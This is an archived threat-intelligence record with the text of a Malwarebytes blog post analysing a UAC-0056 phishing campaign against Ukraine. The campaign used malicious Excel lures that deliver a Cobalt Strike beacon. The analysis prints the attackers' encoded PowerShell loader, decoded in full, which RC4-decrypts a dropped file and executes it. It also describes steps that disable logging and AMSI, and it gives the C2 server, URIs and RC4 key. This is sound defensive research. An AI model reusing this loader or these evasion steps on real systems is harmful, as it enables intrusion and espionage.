{
	"id": "0c32c69f-868c-425e-b823-e4f4c8799584",
	"created_at": "2026-04-06T00:15:56.07733Z",
	"updated_at": "2026-04-10T03:35:37.630032Z",
	"deleted_at": null,
	"sha1_hash": "59bc2ddd6758cf529b33ba5d7972c9db36002596",
	"title": "Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2018679,
	"plain_text": "Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest\r\ncampaign\r\nBy Mark Stockley\r\nPublished: 2022-07-12 · Archived: 2026-04-05 16:34:42 UTC\r\nThis blog was authored by Roberto Santos and Hossein Jazi\r\nThe Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with\r\nhigh confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted government entities\r\nin Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).\r\nLures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have\r\nbeen closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.\r\nIn this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have\r\nobserved. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the\r\nend of June.\r\nDifferent themes, same techniques\r\nSince the publication of our blog post There’s a Go Elephant in the room, we have tracked several new samples, as can be\r\nseen in the timeline below:\r\nLet’s dig further into those relationships. UA-CERT has attributed the document named “Information on the availability of\r\nvacancies and their staffing.xls” to UAC-0056. 
This file looked familiar to us, and for good reason: the macro is\r\nnearly identical to the document we analyzed in our initial blog:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/\r\nPage 1 of 7\n\nIn the most recent attack reported by UA-CERT (Humanitarian catastrophe of Ukraine since February 24, 2022.xls) we\r\nsee a macro almost identical to the one used in another decoy document called Help Ukraine.xls:\r\nThe Help Ukraine lure, to our knowledge, has never been publicly documented before:\r\nWe were able to identify 7 different samples with that theme, including one\r\n(258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous\r\nattack:\r\nAlso, in the past we found comments referring to a domain named ExcelVBA[.]ru. This document was contacting a\r\nsuspiciously similar domain named excel-vba[.]ru.\r\nAmong victims, we find gov.ua emails being targeted. One of the texts used as the email body in the last campaign was written\r\nin Ukrainian and translates to:\r\nOn February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of\r\nUkraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the\r\nOffice of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens\r\nof Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of\r\ndestroyed homes, on the number of destroyed businesses as a result of an act of aggression. This report shows all\r\nthe data broken down by regions of Ukraine. 
Familiarize yourself and familiarize your colleagues with the real\r\nstate of affairs. Glory to Ukraine!\r\nTranslation of original email sent to victims\r\nWe will focus our analysis on these 3 newer templates. Exact names and paths are from\r\n024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 (Information on the availability of vacancies\r\nand their staffing.xls). The analysis is still valid for the others, although minor changes exist between samples.\r\nwrite.bin\r\nThe document will download an executable file named write.bin. Other attacks following the same scheme used different\r\nnames for this file, including Office.exe, baseupd.exe and DataSource.exe. The file is slightly obfuscated, and performs the\r\nfollowing actions:\r\nEstablishing persistence\r\nAfter some anti-debug tricks, the registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Check License is used to\r\nestablish persistence.\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update Checker is checked first, because that was the key used by previous versions of the malware.\r\nDropping next stage\r\nThe next step is dropping a file in C:\\ProgramData\\TRYxaEbX. 
This file will be used later.\r\nThe payload will execute the following PowerShell Base64 encoded command:\r\nJABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQA\r\nThe chunk above is Base64 encoded and decodes to:\r\n$A1 = [System.IO.File]::ReadAllBytes(\"C:\\ProgramData\\TRYxaEbX\");\r\n$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};\r\n$C = (\u0026 $A $A1 $B1);\r\n$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);\r\n$E = $E -Split [Environment]::NewLine;\r\nforeach($EE in $E){iex $($EE+\";\");};\r\nIn short, the file dropped in C:\\ProgramData\\TRYxaEbX will be decrypted with the RC4 algorithm using\r\nCmAJngvdDmiTjLxN\r\nas the key. This next PowerShell script will look like:\r\nHere we can see some of the actions that will be taken:\r\nDisable script logging\r\nDisable Module Logging\r\nDisable Transcription\r\nDisable AMSI protection\r\nAfter this step, another Base64 payload is decoded and executed:\r\nCobalt Strike payload deployed\r\nAs can be seen, the main functionality provided by this second PowerShell file is to inject shellcode. 
This shellcode can be\r\n32 or 64 bit, and is a Cobalt Strike beacon with the following configuration:\r\nBeaconType – HTTPS\r\nPort – 443\r\nSleepTime – 30000\r\nPublicKey_MD5 – defb5d95ce99e1ebbf421a1a38d9cb64\r\nC2Server – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/\r\nUserAgent – Mozilla/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko_10984gap\r\nHttpPostUri – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/\r\nWatermark – 1580103824\r\nWith a Cobalt Strike beacon running on the victim’s machine, the host is now fully compromised.\r\nAttacker probes the sandbox\r\nAt the time of writing, the malicious C\u0026C servers seem to be down. However, on July 5 we saw active servers and successful\r\nconnections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the\r\ncontents of several folders.\r\nWe were able to decode the network communications using Didier Stevens’ excellent collection of Cobalt Strike tools.\r\nWe consider these actions preliminary moves to check whether the machine is a viable target or not before following up with\r\nother actions.\r\nAttribution to UAC-0056\r\nBased on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can\r\nattribute this attack with high confidence to UAC-0056.\r\nSignatures contained in the Cobalt Strike beacons (watermark 1580103824 and public key\r\ndefb5d95ce99e1ebbf421a1a38d9cb64) may be used to connect the attack to other groups. 
For instance, the public key should be unique among deployments,\r\naccording to the CobaltStrike documentation.\r\nHowever, it is important to note that in that case we cannot simply rely on a public key to attribute the sample we analyzed\r\nin this report. In fact, these signatures have been attributed to many different groups. Our assessment is that the group used a\r\nleaked version of Cobalt Strike and used the same private key as others, making attribution harder.\r\nMalwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.\r\nIOCs\r\nMalicious Excel documents (Help Ukraine template)\r\nMalicious Excel documents (Humanitarian template)\r\nPayloads\r\nCobalt Strike beacon and payloads\r\nSource: 
https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/"
	],
	"report_names": [
		"cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "eecf54a2-2deb-41e5-9857-fed94a53f858",
			"created_at": "2023-01-06T13:46:39.349959Z",
			"updated_at": "2026-04-10T02:00:03.296196Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Bleeding Bear",
				"Cadet Blizzard",
				"Nascent Ursa",
				"Nodaria",
				"Storm-0587",
				"DEV-0587",
				"Saint Bear",
				"EMBER BEAR",
				"UNC2589",
				"TA471",
				"UAC-0056",
				"FROZENVISTA",
				"Lorec53",
				"Lorec Bear"
			],
			"source_name": "MISPGALAXY:SaintBear",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c28760b2-5ec6-42ad-852f-be00372a7ce4",
			"created_at": "2022-10-27T08:27:13.172734Z",
			"updated_at": "2026-04-10T02:00:05.279557Z",
			"deleted_at": null,
			"main_name": "Ember Bear",
			"aliases": [
				"Ember Bear",
				"UNC2589",
				"Bleeding Bear",
				"DEV-0586",
				"Cadet Blizzard",
				"Frozenvista",
				"UAC-0056"
			],
			"source_name": "MITRE:Ember Bear",
			"tools": [
				"P.A.S. Webshell",
				"CrackMapExec",
				"ngrok",
				"reGeorg",
				"WhisperGate",
				"Saint Bot",
				"PsExec",
				"Rclone",
				"Impacket"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "03a6f362-cbab-4ce9-925d-306b8c937bf1",
			"created_at": "2024-11-01T02:00:52.635907Z",
			"updated_at": "2026-04-10T02:00:05.339384Z",
			"deleted_at": null,
			"main_name": "Saint Bear",
			"aliases": [
				"Saint Bear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"Lorec53"
			],
			"source_name": "MITRE:Saint Bear",
			"tools": [
				"OutSteel",
				"Saint Bot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "083d63b2-3eee-42a8-b1bd-54e657a229e8",
			"created_at": "2022-10-25T16:07:24.143338Z",
			"updated_at": "2026-04-10T02:00:04.879634Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Ember Bear",
				"FROZENVISTA",
				"G1003",
				"Lorec53",
				"Nascent Ursa",
				"Nodaria",
				"SaintBear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"UNC2589"
			],
			"source_name": "ETDA:SaintBear",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Elephant Client",
				"Elephant Implant",
				"GraphSteel",
				"Graphiron",
				"GrimPlant",
				"OutSteel",
				"Saint Bot",
				"SaintBot",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434556,
	"ts_updated_at": 1775792137,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/59bc2ddd6758cf529b33ba5d7972c9db36002596.pdf",
		"text": "https://archive.orkl.eu/59bc2ddd6758cf529b33ba5d7972c9db36002596.txt",
		"img": "https://archive.orkl.eu/59bc2ddd6758cf529b33ba5d7972c9db36002596.jpg"
	}
}